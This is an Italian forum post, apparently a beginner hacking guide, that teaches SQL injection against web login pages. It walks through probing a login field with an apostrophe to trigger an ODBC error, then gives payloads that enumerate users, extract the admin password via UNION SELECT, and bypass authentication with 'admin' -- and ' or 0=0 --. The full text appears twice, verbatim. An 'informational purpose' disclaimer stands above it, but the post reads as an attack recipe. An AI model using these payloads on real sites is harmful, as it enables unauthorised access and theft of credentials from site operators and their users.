NE IO NE LO SCIAX2 FORUM CI ASSUMIAMO LA COLPA DELL'USO FATTO CON QUESTA GUIDA , CHE è A PURO SCOPO INFORMATIVO. Niente lamerate
Andiamo in una pagina che preveda un
login utente, poi dove si inserisce l' userID bisogna inserire
' (l'apostrofo) ed inviare,
non bisogna inserire alcun tipo di password.
Se tutto è andato a buon fine, dovrebbe apparire un messagio del tipo:
__________________________________________________________________________________________________
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query
expression 'ID=''' AND PASSWORD='''.
/scripts/login.asp, line 30
__________________________________________________________________________________________________
in caso contrario ci apparirà un messagio che ci informa che userID o la
password sono errati ( in questi casi molto probabilmete non sono possibili
azioni maliziose).
Ora tornando alla nostra applicazione modificabile iniziamo a ricercare
informazioni come lo scoprire se esiste o meno un utente admin andando ad
inserire nella zona dell' userID il seguente comando:
__________________________________________________________________________________________________
' union select min(UserID),1,1,1 from members where
UserID > 'a'--
__________________________________________________________________________________________________
oppure possiamo tentare di trovare addirittura la
password dell' admin inserendo sempre nel campo dell' userID il comando:
__________________________________________________________________________________________________
' union select Password,1,1,1 from members where
UserID = 'admin'--
__________________________________________________________________________________________________
di questi comandi simili ce ne sono parecchi come ad esempio:
__________________________________________________________________________________________________
admin' --
__________________________________________________________________________________________________
che ci permette di validarci come admin oppure un' altro comando potrebbe
essere:
__________________________________________________________________________________________________
' or 0=0 --sp_password
__________________________________________________________________________________________________
che ci permetterà il login come il primo utente presente nella lista.
Solo a scopo infomatico
FONTE : Forum
Andiamo in una pagina che preveda un
login utente, poi dove si inserisce l' userID bisogna inserire
' (l'apostrofo) ed inviare,
non bisogna inserire alcun tipo di password.
Se tutto è andato a buon fine, dovrebbe apparire un messagio del tipo:
__________________________________________________________________________________________________
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query
expression 'ID=''' AND PASSWORD='''.
/scripts/login.asp, line 30
__________________________________________________________________________________________________
in caso contrario ci apparirà un messagio che ci informa che userID o la
password sono errati ( in questi casi molto probabilmete non sono possibili
azioni maliziose).
Ora tornando alla nostra applicazione modificabile iniziamo a ricercare
informazioni come lo scoprire se esiste o meno un utente admin andando ad
inserire nella zona dell' userID il seguente comando:
__________________________________________________________________________________________________
' union select min(UserID),1,1,1 from members where
UserID > 'a'--
__________________________________________________________________________________________________
oppure possiamo tentare di trovare addirittura la
password dell' admin inserendo sempre nel campo dell' userID il comando:
__________________________________________________________________________________________________
' union select Password,1,1,1 from members where
UserID = 'admin'--
__________________________________________________________________________________________________
di questi comandi simili ce ne sono parecchi come ad esempio:
__________________________________________________________________________________________________
admin' --
__________________________________________________________________________________________________
che ci permette di validarci come admin oppure un' altro comando potrebbe
essere:
__________________________________________________________________________________________________
' or 0=0 --sp_password
__________________________________________________________________________________________________
che ci permetterà il login come il primo utente presente nella lista.
Solo a scopo infomatico
FONTE : Forum
